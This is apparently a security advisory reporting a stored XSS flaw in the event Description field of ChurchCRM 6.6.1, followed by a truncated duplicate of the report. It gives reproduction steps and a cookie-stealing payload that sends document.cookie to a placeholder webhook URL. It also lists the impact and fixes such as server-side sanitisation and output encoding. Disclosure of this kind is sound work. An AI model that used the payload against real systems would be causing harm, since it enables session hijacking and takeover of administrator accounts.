Stored Cross-Site Scripting (XSS) in Create Events in Church Calendar Leading to Account Takeover (ChurchCRM latest version 6.6.1)
Date: January 5, 2026
Researcher: Nguyen Truong Son (truongson526@gmail.com)
Summary
The Stored Cross-Site Scripting (XSS) vulnerability occurs in Create Events in Church Calendar. Users with low privileges can create XSS payloads in the Description field. This payload is stored in the database, and when other users view that event (including the admin), the payload is triggered, leading to account takeover.
Details
When creating an event in the Calendar section, user input is only validated in the user interface. An attacker can use Burp Suite to intercept the request, then modify the XSS payload in the Description field. The XSS payload will then be stored in the database. When another user views the event created by the attacker, the payload is triggered, and the attacker obtains the user's cookie, leading to account takeover.
Vulnerable Fields:
POST /api/events/{id}
Name of JSON field: Desc
PoC
Video PoC: https://drive.google.com/drive/u/0/folders/12baz_wj1_MGeMZe6ah5NxqGDlitJFw_e
- Login as low privilege user
- I created a new user who only has the right to create events in Calendar (Username: attacker_1)
- Log in as user “attacker_1” and go to the Calendar section.
- Create a new event with the following content, turn on Intercept in Burp Suite, then click “Save”
- Description: <img src=x onerror=fetch('{webhook URL}?cookie='+document.cookie)>
- In Intercept tab, you can see that the value of the Desc field is being validated.
- Send request to Repeater, modify the value of the Desc field:
- Drop request in Intercept tab, then turn off intercept. The newly created event is now displayed on the interface.
- Login as admin (Church Admin), go to Calendar Section, then click on the event that the attacker just created (Attacker event). Observing the results on the Webhook, noticed that cookies were being sent.
- Replace the obtained cookie -> Reload page -> Gain admin account access.
Impact
- Session hijacking / account takeover: Theft or use of victims’ session tokens or performance of state-changing actions via the victim’s session.
- Privilege escalation: Targeting admins/moderators reviewing content can lead to full application compromise.
- Data exposure & integrity loss: Read/modify user data, change account settings, initiate transactions, add backdoor admins, etc.
- Wider compromise: Can be chained with CSRF bypasses, OAuth token theft (if tokens handled in DOM), or service worker abuse.
Recommendation
- Implement output encoding (htmlspecialchars) for all field renderings.
- Validate and sanitize data on server-side.
- Consider use of a central escaping library or templating engine.
SonNTB21DCAT164 Reporter
Stored Cross-Site Scripting (XSS) in Create Events in Church Calendar Leading to Account Takeover (ChurchCRM latest version 6.6.1)
Date: January 5, 2026
Researcher: Nguyen Truong Son (truongson526@gmail.com)
Summary
The Stored Cross-Site Scripting (XSS) vulnerability occurs in Create Events in Church Calendar. Users with low privileges can create XSS payloads in the Description field. This payload is stored in the database, and when other users view that event (including the admin), the payload is triggered, leading to account takeover.
Details
When creating an event in the Calendar section, user input is only validated in the user interface. An attacker can use Burp Suite to intercept the request, then modify the XSS payload in the Description field. The XSS payload will then be stored in the database. When another user views the event created by the attacker, the payload is triggered, and the attacker obtains the user's cookie, leading to account takeover.
Vulnerable Fields:
POST /api/events/{id}
Name of JSON field: Desc
PoC
Video PoC: https://drive.google.com/drive/u/0/folders/12baz_wj1_MGeMZe6ah5NxqGDlitJFw_e
Impact
Recommendation